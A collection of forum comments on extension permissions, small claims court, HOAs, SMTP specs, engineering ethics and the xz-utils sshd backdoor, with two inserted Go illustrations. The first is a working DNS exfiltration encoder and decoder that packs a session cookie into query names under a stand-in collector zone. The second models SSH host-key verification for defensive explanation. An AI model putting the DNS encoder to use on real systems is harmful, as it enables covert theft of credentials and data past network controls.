Yes, a network access and DOM write permission should be one and the same. I think the reason it isn't done is because there are so many ways to leak data over a network. If the extension can trigger a DNS lookup somehow, it can exfiltrate data.
Android used to have a network permission but Google removed it.
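The comment above argues that any DNS lookup is already a network channel. The following Go program, added here as an illustration and not part of the original discussion, shows why: it packs arbitrary bytes into RFC 1035-conformant names (labels of at most 63 octets, names of at most 253 characters) under an attacker-controlled zone and reassembles them from the resolver's query log. The zone name `collector.example` and the sample data are constructed for the example; the program never performs a lookup, it only builds the names that a lookup would carry.

```go
package main

import (
	"encoding/base32"
	"fmt"
	"sort"
	"strconv"
	"strings"
)

// Constructed zone for the example: the receiving side would run the
// authoritative server for it and log every name it is asked about.
const exfilZone = "collector.example" // hypothetical

// RFC 1035 wire limits: 63 octets per label, 253 characters per name.
const (
	maxLabel      = 63
	maxName       = 253
	bytesPerLabel = 32 // 32 raw bytes -> 52 base32 characters, under maxLabel
	labelsPerName = 3  // 96 payload bytes per query
)

// Unpadded base32 keeps labels to [a-z2-7], valid in a hostname; DNS is
// case-insensitive, so the receiver upper-cases before decoding.
var b32 = base32.StdEncoding.WithPadding(base32.NoPadding)

// EncodeQueries turns data into a sequence of resolvable names. The first
// label is a sequence number so the receiver can reorder queries that
// intermediate resolvers retry or deliver out of order.
func EncodeQueries(data []byte, zone string) ([]string, error) {
	chunk := bytesPerLabel * labelsPerName
	var names []string
	for seq := 0; seq*chunk < len(data); seq++ {
		piece := data[seq*chunk:]
		if len(piece) > chunk {
			piece = piece[:chunk]
		}
		labels := []string{strconv.Itoa(seq)}
		for off := 0; off < len(piece); off += bytesPerLabel {
			end := off + bytesPerLabel
			if end > len(piece) {
				end = len(piece)
			}
			labels = append(labels, strings.ToLower(b32.EncodeToString(piece[off:end])))
		}
		name := strings.Join(labels, ".") + "." + zone
		if len(name) > maxName {
			return nil, fmt.Errorf("name %d exceeds %d characters", seq, maxName)
		}
		names = append(names, name)
	}
	return names, nil
}

// DecodeQueries is what the receiving resolver runs over its query log.
func DecodeQueries(names []string, zone string) ([]byte, error) {
	type part struct {
		seq  int
		data []byte
	}
	var parts []part
	for _, name := range names {
		if !strings.HasSuffix(name, "."+zone) {
			return nil, fmt.Errorf("%q is not under %s", name, zone)
		}
		labels := strings.Split(strings.TrimSuffix(name, "."+zone), ".")
		seq, err := strconv.Atoi(labels[0])
		if err != nil {
			return nil, err
		}
		var buf []byte
		for _, l := range labels[1:] {
			raw, err := b32.DecodeString(strings.ToUpper(l))
			if err != nil {
				return nil, err
			}
			buf = append(buf, raw...)
		}
		parts = append(parts, part{seq, buf})
	}
	sort.Slice(parts, func(i, j int) bool { return parts[i].seq < parts[j].seq })
	var out []byte
	for _, p := range parts {
		out = append(out, p.data...)
	}
	return out, nil
}

// LongestLabel reports the longest label in a name, for checking the 63-octet limit.
func LongestLabel(name string) int {
	n := 0
	for _, l := range strings.Split(name, ".") {
		if len(l) > n {
			n = len(l)
		}
	}
	return n
}

func main() {
	secret := []byte("session=constructed-sample-cookie-value-for-the-demo") // constructed
	names, _ := EncodeQueries(secret, exfilZone)
	for _, n := range names {
		// A real sender would call net.LookupHost(n) here; the answer is
		// irrelevant, the query itself is the message.
		fmt.Println(n)
	}
}
```

The sequence label matters in practice: recursive resolvers cache, retry and reorder, so a receiver that relies on arrival order will corrupt the payload. Blocking the extension's own sockets does nothing against this path, because the lookup is performed by the browser or OS resolver on its behalf.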
> Android used to have a network permission but Google removed it.
That's because Google is in the ads business and wants apps to always be able to exfiltrate data to Google (Google Analytics, Google Ads, etc.) and display ads without needing additional permissions.
Having a network permission means there is an incentive for apps to not have the network permission which means they can't load ads. And Google wants you to look at their ads.
Yep, so after a few years of litigation and hours of time filling out forms on your state’s awful judicial portal (hopefully correctly!) you might stand a chance at a judgement. Then you can spend more time going back to court when they don’t pay, talking about time payment plans, etc. Maybe they’ll pay some of it, maybe not. Then they move to another state and you need to get your judgement domesticated there (with an in-person visit). Also, remember to keep renewing that judgement or it goes bye-bye!
Remember that the goal of the defendant is to exhaust the plaintiff, and cause them to spend more time than the judgement is worth. This is how the small claims system works.
> Yep, so after a few years of litigation and hours of time filling out forms on your state’s awful judicial portal (hopefully correctly!) you might stand a chance at a judgement
Do you have any examples of states where it takes hours of filling out forms for a small claims case?
The ones I've seen have been pretty simple.
California asks for plaintiff contact information, defendant contact information, how much money the plaintiff is asking for and why the plaintiff believes they are owed that, the date that happened and how they calculated the amount, whether or not you've asked the defendant to pay you, a multiple choice question on which geographical aspect of the case takes place within the territory covered by the particular courthouse where you are filing, the zip code of the place that aspect of the case took place if you know it, whether or not the case is about an attorney-client fee dispute, if you are suing a public entity, if you've filed more than 12 other small claims within the last 12 months in California, and if your claim is for more than $2500 and, if it is, whether you understand that you cannot file more than two small claims above $2500 in a single year.
California's is one of the more involved ones that I've seen.
Washington is pretty much just name the parties, how much you think you are owed, what it is owed for (a checklist with categories like faulty workmanship, merchandise, rent, property damage, and a line to write in something else), and an explanation of the reason for the claim.
It is. And someone will certainly make it happen. But most people don’t even know where their local small claims courts are, much less how to make a case, and lawyers cost money, and that is where most people end the conversation.
Yes, you can represent yourself and win, but it’s a lot of time, effort, and money (because time is money).
Someone will do this, and it will be great precedent. But most people will simply accept it because they don’t have the time or means.
As with race conditions, making things faster doesn't change things but only exposes preexisting problems. The preexisting problem I see here is sloppy definition of existence for the message: if you can see the message on a burning piece of paper, it should be considered to still exist (just as a message being sent with smoke signals does not disappear the moment it's committed to smoke).
E: The obvious way to fix this is to stop talking about messages existing/not existing, but talk in terms of messages being stored in X (or having been deleted from X), for some value of X.
It’s not the word “exists” that causes the problem (although it definitely gives it an added air of strange mystery). It’s the word “this.” Consider the case of a draft email I am writing on my laptop, but have to leave before finishing. Later, I resume composing the email on my phone and I hit send. But I do it in a hurry and mostly forget about it. The next morning, though, I open my laptop and I see the still unfinished draft I left there.
Now, when I try to finish and send that I’m hopefully going to get an error message. But “you already sent this email” is both right and wrong, since “this” email (the one I’m looking at) may have different contents from the one I sent.
Agreed that the best error message is just more precise though: “You are attempting to edit a draft that you already finished and sent from another device. Would you like to treat this as a new email?” Or something like that.
HOAs require more than (or a very specific extension of) freedom of association to exist: they require an ability to bind any future owners of a piece of land to join the HOA (regardless of how they acquired that land: via sale, inheritance, bankruptcy, ...). For property that's not real estate that's usually not possible (see e.g. inability of companies to provide binding promises on how the data they have are used after they go bankrupt). Given that this ability applies very inconsistently across types of property, it doesn't seem like an essential part of freedom of association.
> HOAs require more than […] freedom of association to exist: they require an ability to bind any future owners of a piece of land to join the HOA […].
You are often not buying a piece of land when you move to an HOA-linked residence; rather, you may be buying a particular unit, but there are also 'common areas' that are the property of the legal entity of the HOA.
If you do not want to be part of an HOA then you have to purchase what is called (at least in Canada) freehold land.
> While most people hear the word “condo” and think of an apartment style unit, that’s not always the case. Some townhouses (and even certain detached homes) are considered condos too.
The GP wasn't talking about the type of structure but the legal organization of the property ownership. Canadian provinces have a Condominium Property Act that defines the legislative framework. The implementation can vary by types of units (ranging from apartment-style to single family homes) and the ownership - typically "you own the inside; communal outside" or "you own the inside & dirt; communal outside and shared public spaces". You don't hear talk of "the HOA" but rather "the Condo Board".
The local government in many areas often requires an HOA to be formed for new developments to manage stormwater and road maintenance that it doesn't want to be responsible for.
In those situations the HOA could be seen as government imposed rather than purely “freedom of association”.
I own a 100 year old home so there is no HOA but it’s difficult for most people to afford such homes since there’s a limited supply and they’re often either in highly desirable or blighted city centers.
> If you do not want to be part of an HOA tell your real estate broker that this is one of the criteria for where you want to live.
Yes, tell your realtor "I don't want to look at any of the properties you have for sale, or any properties within the greater [insert city here] metro area, or for that matter any geographical location within 100 miles of here". He'd look at you less strangely, and might even chuckle instead of telling you to go fuck yourself and to not waste his time.
And the best part of all is that these two requests are essentially identical.
I would never consider any house encumbered with an HOA, and I would fire any realtor who ignored my wishes by showing one - but it's never been an issue, here in Seattle.
It can be done, yes. If the HOA owns and maintains common property then it has to dispose of that somehow. For example, it might need to sell the pool, get the city’s parks department to maintain the playground, and the wastewater department to maintain the drainage pond first.
To steelman the GP's POV: there are other parts of solutions to problems where similar levels of rigour are required and cannot be filled in by using a preexisting library (state machines for distributed business logic come to mind as an example). Eliminating the need for that here doesn't help that much in general, and might even make things worse, because it gives people less experience with tasks demanding rigour before they tackle ones that are both subtler and harder.
Learning to blindly follow a spec for the purposes of parsing the SMTP wire protocol doesn't give you extra ability to follow the state machine or distributed business logic specs better. It just adds to the overall opportunities for you to make a mistake. This also ignores the fact that the SMTP spec is split across multiple RFCs with no single normative version, which further complicates the probability that you implement the spec correctly in the first place.
Engineers get better faster because they leverage better tools and build tools to overcome their own shortcomings and leverage their strengths, not by constantly being beat into shape by unforgiving systems.
To be fair, what you and OP said is not an uncommon mentality. It's even shared in a way by Torvalds:
> [easier to do development with a debugger] And quite frankly, I don't care. I don't think kernel development should be "easy". I do not condone single-stepping through code to find the bug.
I do not think that extra visibility into the system is necessarily a good thing.
> Quite frankly, I'd rather weed out the people who don't start being careful early rather than late. That sounds callous, and by God, it _is_ callous. But it's not the kind of "if you can't stand the heat, get out of the kitchen" kind of remark that some people take it for. No, it's something much more deeper: I'd rather not work with people who aren't careful. It's darwinism in software development. It's a cold, callous argument that says that there are two kinds of people, and I'd rather not work with the second kind. Live with it.
He has similar views about unit tests btw.
I personally would prefer to work with people who are smart and understand systems and have machines take care of subtle details rather than needing to always be 100% careful at all times. No one writing an SMTP parser is at Torvalds' level.
I'm not arguing that this excuses you from being careful or failing to understand things. I'm saying that defensively covering your flank against common classes of mistakes leads to better software than the alternative.
> This also ignores the fact that the SMTP spec is split across multiple RFCs with no single normative version, which further complicates the probability that you implement the spec correctly in the first place.
This is a point I agree with, and the fact that I see it mentioned so rarely, that standards are split across multiple RFCs, makes me suspect that people don't mention it because they don't know, because they never read them in the first place, and rather try to follow the implementation of some existing program.
It can get tedious and annoying, but I don't think it actually affects the likelihood that you'll implement something wrong. The RFCs link to each other when needed. Also groups of RFCs often get combined and edited into a single revised RFC for simplicity.
This makes me wonder: How could the IETF's approach to standardisation be improved? I'm not sure how to fix this problem without overhauling everything.
I have a power meter that sits in front of my kettle (that I also use as a teapot) that notifies me when the tea has finished brewing (i.e. when it finished boiling + a fixed delay).
I don't see why subjective morals cannot be realistically followed. Do you mean that it will mean sufficiently different things for different people that any promise of this shape will not communicate much to strangers, or something else?
Might be more realistic than imposed dogma, you never know.
> I also think we need engineers who do jobs that are ugly to preserve our freedom.
I think so too.
If you build something that can be used for evil purposes, some people along the line are going to have to judge how to build it, or whether or not to build it at all.
This seems like it would always require some moral judgment of some kind.
An engineer who plays an important technical role should not be removed from this type of responsibility.
For instance, consider making weapons, some of which might be used offensively, others only defensively.
Some engineers would have no moral qualms against either type, others would be more selective, and others would not be willing at all. But regardless, coexistence is assured if it is accepted from the outset as an engineering goal.
These are really quite "different things for different people", triggering a different degree of uneasiness as different lines are crossed. All based on a moral foundation, incidentally whose goalposts can be moved whether anyone wants them to or not.
All could be valid depending on the situation, but a creed for the profession can help to better focus outcome, away from the direction of making things worse for humanity because of your efforts.
Experience has shown you really don't want people in key positions without a moral compass to guide their aspirations, and engineering can be important.
Yes, it communicates nothing. As mentioned by another commenter, it's effectively aspirational ethics, and I do not work towards aspirations, I work towards reality.
> The only variable inside its own table is yolAbejyiejuvnup=Evjtgvsh5okmkAvj, which in this context serves as a kill switch.
This seems false? The trie contained also strings like `WAYLAND_DISPLAY=`, so IIUC the backdoor would remain dormant if someone tried to run sshd from something that looks like an interactive session.
I don't understand what happens when the sensor is bent in more than one location.
At the beginning you mention a ToF sensor, which made me think that you're looking at reflections from the bends and measuring distance to them, but this seems not to be the case. ISTM that if you bend the sensor in two places, you'll simply get the sum of the log-attenuations from both. If we assume that the "strength" of the bend continuously changes attenuation, ISTM that you need as many strands as there are gap locations to be able to disambiguate between any two sets of bends.
Am I misreading something or is this intended to operate in cases where we know only one bend is present?
In the paragraph "Visualization of the OptiGap Sensor System" it looks like the gap pattern from multiple sensors is providing a unique signature that can be translated into the exact location on the length of the sensors. The mechanism for translating the wave forms to actual location seems to be based on a Bayesian model, according to the "Realtime Machine Learning on a Microcontroller" paragraph.
SSH does client authentication after the handshake. The server is required to sign the handshake result with its private key, so you won't get past the handshake if you are a server that claims to have a public key that you don't know the private key for.
E: see RFC 4253, sections 8 and 10, and RFC 4252 for corroboration
Huh, I had erroneously thought the exploit string was sent earlier in the connection, before the handshaking completed (note the "handshake failed" error in xzbot on successful exploit, and also the fact that no logging is done).
But you're right: we've verified the hostkey by the time we send the special certificate. So there's no way to effectively replay this without access to the server keys. My original comment is incorrect.
I'm actually surprised there's no logging at INFO or higher after this succeeds, given that openssh typically logs preauth connection closes. But I guess the crutch is that we never log connection opens and we only really log failures in handshaking, and it's not like the backdoor is going to go out of its way to log the fact that it opened itself...
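The ordering the last few comments settle on (RFC 4253 key exchange and host-key signature first, RFC 4252 user authentication only afterwards) is easy to get wrong from memory, so here is a small Go model of it, added here as an illustration and not code from OpenSSH or from the xz-utils backdoor. It simulates both ends of an X25519 key exchange, has the server sign the exchange hash H with an Ed25519 host key, and has the client verify that signature against its pinned known_hosts key before it would send SSH_MSG_USERAUTH_REQUEST. Assumptions: the version strings and KEXINIT payloads are constructed stand-ins, SHA-256 is used as the hash, and e, f and K are hashed as plain strings rather than mpints, so the H computed here is not byte-identical to a real implementation's.

```go
package main

import (
	"bytes"
	"crypto/ecdh"
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
)

// sshString encodes a byte string as an RFC 4251 "string": uint32 length, then bytes.
func sshString(b []byte) []byte {
	var l [4]byte
	binary.BigEndian.PutUint32(l[:], uint32(len(b)))
	return append(l[:], b...)
}

// ExchangeHash is H from RFC 4253 section 8:
//   H = HASH(V_C || V_S || I_C || I_S || K_S || e || f || K)
// Simplification (assumption): e, f and K are hashed as plain strings here;
// a real implementation encodes them as mpints and uses the negotiated hash.
func ExchangeHash(vc, vs, ic, is, ks, e, f, k []byte) []byte {
	h := sha256.New()
	for _, field := range [][]byte{vc, vs, ic, is, ks, e, f, k} {
		h.Write(sshString(field))
	}
	return h.Sum(nil)
}

// Server models the host-key side. A genuine server holds HostPriv. An
// impostor who only knows the public key has HostPriv == nil and may try to
// reuse a signature captured from an earlier session (ReplaySig).
type Server struct {
	HostPub   ed25519.PublicKey
	HostPriv  ed25519.PrivateKey
	ReplaySig []byte
}

// Outcome records how far a connection got.
type Outcome struct {
	UserauthSent bool   // true only once the client verified the host-key signature
	H, Sig       []byte // exposed so a caller can capture and try to replay Sig
	Err          error
}

// NewHostKey generates an Ed25519 host key pair.
func NewHostKey() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	return pub, priv
}

// RunHandshake simulates both ends of the RFC 4253 key exchange up to the
// point where the client would begin RFC 4252 user authentication.
// knownHost is the key the client has pinned in known_hosts.
func RunHandshake(srv *Server, knownHost ed25519.PublicKey) Outcome {
	curve := ecdh.X25519()
	clientKey, err := curve.GenerateKey(rand.Reader)
	if err != nil {
		return Outcome{Err: err}
	}
	serverKey, err := curve.GenerateKey(rand.Reader)
	if err != nil {
		return Outcome{Err: err}
	}
	e := clientKey.PublicKey().Bytes() // fresh per connection, so H is never reusable
	f := serverKey.PublicKey().Bytes()
	kServer, err := serverKey.ECDH(clientKey.PublicKey())
	if err != nil {
		return Outcome{Err: err}
	}
	kClient, err := clientKey.ECDH(serverKey.PublicKey())
	if err != nil {
		return Outcome{Err: err}
	}

	// Constructed stand-ins for the version strings and KEXINIT payloads.
	vc, vs := []byte("SSH-2.0-client"), []byte("SSH-2.0-server")
	ic, is := []byte("KEXINIT-client"), []byte("KEXINIT-server")

	// Server side: compute H and sign it with the host private key, or fake it.
	hServer := ExchangeHash(vc, vs, ic, is, srv.HostPub, e, f, kServer)
	var sig []byte
	switch {
	case srv.HostPriv != nil:
		sig = ed25519.Sign(srv.HostPriv, hServer)
	case srv.ReplaySig != nil:
		sig = srv.ReplaySig
	default:
		sig = make([]byte, ed25519.SignatureSize)
	}

	// Client side: recompute H independently, pin the host key, verify the signature.
	hClient := ExchangeHash(vc, vs, ic, is, srv.HostPub, e, f, kClient)
	if !bytes.Equal(srv.HostPub, knownHost) {
		return Outcome{H: hClient, Sig: sig, Err: errors.New("host key does not match known_hosts")}
	}
	if !ed25519.Verify(knownHost, hClient, sig) {
		return Outcome{H: hClient, Sig: sig, Err: errors.New("bad host-key signature over H; aborting before userauth")}
	}
	// Only here would the client send SSH_MSG_USERAUTH_REQUEST (RFC 4252),
	// the first message that could carry a certificate.
	return Outcome{UserauthSent: true, H: hClient, Sig: sig}
}

func main() {
	pub, priv := NewHostKey()
	genuine := RunHandshake(&Server{HostPub: pub, HostPriv: priv}, pub)
	fmt.Println("genuine server, userauth reached:", genuine.UserauthSent)
	replay := RunHandshake(&Server{HostPub: pub, ReplaySig: genuine.Sig}, pub)
	fmt.Println("impostor replaying an old signature:", replay.UserauthSent, replay.Err)
}
```

The replay case is the one worth noting: even a signature captured from a genuine session is useless to an impostor, because the client contributes a fresh e every connection, so H, and therefore the signature the client expects, differs each time. Anything sent during userauth is thus only ever received by a party that proved possession of the host private key.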